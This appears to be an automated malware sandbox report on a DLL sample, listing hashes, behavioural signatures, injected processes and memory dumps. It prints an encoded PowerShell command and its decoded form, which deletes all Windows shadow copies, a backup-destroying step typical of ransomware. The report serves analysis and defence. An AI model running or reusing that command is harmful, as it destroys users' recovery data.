Analysis
- max time kernel: 117s
- max time network: 122s
- platform: windows7_x64
- resource: win7-en-20211208
- submitted: 01-02-2022 12:54
Static task: static1
Behavioral task: behavioral1
- Sample: 578e1b00157447f99716b646af6b0c33d0f6c32257a19376d6cc9d003ff0fba1.dll
- Resource: win7-en-20211208
Behavioral task: behavioral2
- Sample: 578e1b00157447f99716b646af6b0c33d0f6c32257a19376d6cc9d003ff0fba1.dll
- Resource: win10v2004-en-20220113
General
- Target: 578e1b00157447f99716b646af6b0c33d0f6c32257a19376d6cc9d003ff0fba1.dll
- Size: 164KB
- MD5: 722e15d85827d3ac13e56e8108688012
- SHA1: cab935a24d7d0ea7e8d93851f7ea94ab9bccfc34
- SHA256: 578e1b00157447f99716b646af6b0c33d0f6c32257a19376d6cc9d003ff0fba1
- SHA512: 59e24cf313db4413f44f16a8276d072f43402e718c25e1d00e81ddc69a1937473cfd1902c320bc9175d75a0d43a53ab3e971b8447ec1cf9cf9aa3aa536464273
Malware Config
Signatures
- Enumerates connected drives (3 TTPs, 24 IoCs)
  Attempts to read the root path of hard drives other than the default C: drive.
  Processes: rundll32.exe
  description: File opened (read-only); process: rundll32.exe; ioc (one per event):
  \??\H:  \??\M:  \??\N:  \??\S:  \??\Z:  \??\J:  \??\L:  \??\O:
  \??\Q:  \??\R:  \??\T:  \??\V:  \??\G:  \??\I:  \??\P:  \??\U:
  \??\Y:  \??\A:  \??\B:  \??\E:  \??\F:  \??\K:  \??\W:  \??\X:
- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  Processes: rundll32.exe, powershell.exe
  pid   process
  1624  rundll32.exe
  960   powershell.exe
- Suspicious use of AdjustPrivilegeToken (4 IoCs)
  Processes: powershell.exe, vssvc.exe
  description                 pid   process
  Token: SeDebugPrivilege     960   powershell.exe
  Token: SeBackupPrivilege    928   vssvc.exe
  Token: SeRestorePrivilege   928   vssvc.exe
  Token: SeAuditPrivilege     928   vssvc.exe
- Suspicious use of WriteProcessMemory (11 IoCs)
  Processes: rundll32.exe, rundll32.exe
  description                        pid   process       target process   events
  PID 1744 wrote to memory of 1624   1744  rundll32.exe  rundll32.exe     7
  PID 1624 wrote to memory of 960    1624  rundll32.exe  powershell.exe   4
Processes
- C:\Windows\system32\rundll32.exe
  rundll32.exe C:\Users\Admin\AppData\Local\Temp\578e1b00157447f99716b646af6b0c33d0f6c32257a19376d6cc9d003ff0fba1.dll,#1
  - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\rundll32.exe
    rundll32.exe C:\Users\Admin\AppData\Local\Temp\578e1b00157447f99716b646af6b0c33d0f6c32257a19376d6cc9d003ff0fba1.dll,#1
    - Enumerates connected drives
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      (the -e argument is a base64-encoded UTF-16LE command; it decodes to: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();})
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
- C:\Windows\system32\vssvc.exe
  C:\Windows\system32\vssvc.exe
  - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- memory/960-55-0x000007FEFBE61000-0x000007FEFBE63000-memory.dmp (filesize: 8KB)
- memory/960-57-0x0000000002660000-0x0000000002762000-memory.dmp (filesize: 1.0MB)
- memory/960-58-0x0000000002762000-0x0000000002764000-memory.dmp (filesize: 8KB)
- memory/960-59-0x0000000002764000-0x0000000002767000-memory.dmp (filesize: 12KB)
- memory/960-56-0x000007FEF2CD0000-0x000007FEF382D000-memory.dmp (filesize: 11.4MB)
- memory/960-60-0x000000000276B000-0x000000000278A000-memory.dmp (filesize: 124KB)
- memory/1624-54-0x0000000075761000-0x0000000075763000-memory.dmp (filesize: 8KB)